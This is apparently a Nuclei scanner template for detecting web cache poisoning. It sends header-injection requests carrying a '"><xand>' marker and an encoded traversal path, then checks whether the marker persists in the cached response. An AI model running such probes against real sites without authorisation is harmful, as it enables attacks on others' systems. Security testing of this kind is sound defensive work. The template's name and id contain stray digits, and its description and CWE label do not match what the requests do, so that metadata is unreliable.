id: cache_xsfor_solo_traversal122333333rails

info:
  name: Cache cache_xsfor_solo Detect222ion - X-Forwarded Headers Injection333333rails
  author: xandsz
  severity: medium
  description: |
    Testa a possibilidade de envenenamento de cache manipulando headers `X-Forwarded-*`, `Cache-Control`, `Pragma`, `Referrer`, `User-Agent` e outros, verificando se o conteúdo injetado persiste na resposta cacheada.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 3
  tags: cache, poisoning, x-forwarded, injection, fuzzer

http:
  # Primeira requisição - Envenenar o cache com headers manipulados
  - raw:
      - |
        GET /.%2f%2e%2e%2f?cb=111222 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/107.0"><xand>
        X-Forwarded-Host: "><xand>

    stop-at-first-match: true

  # Segunda requisição - Repetir headers para reforçar o envenenamento
  - raw:
      - |
        GET /.%2f%2e%2e%2f?cb=111222 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/107.0"><xand>
        X-Forwarded-Host: "><xand>
    stop-at-first-match: true

  # Terceira requisição - Testa se o conteúdo foi envenenado (SEM HEADERS)
  - raw:
      - |
        GET /.%2f%2e%2e%2f?cb=111222 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/107.0
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><xand>'  # Verifica se o payload aparece no HTML da resposta final
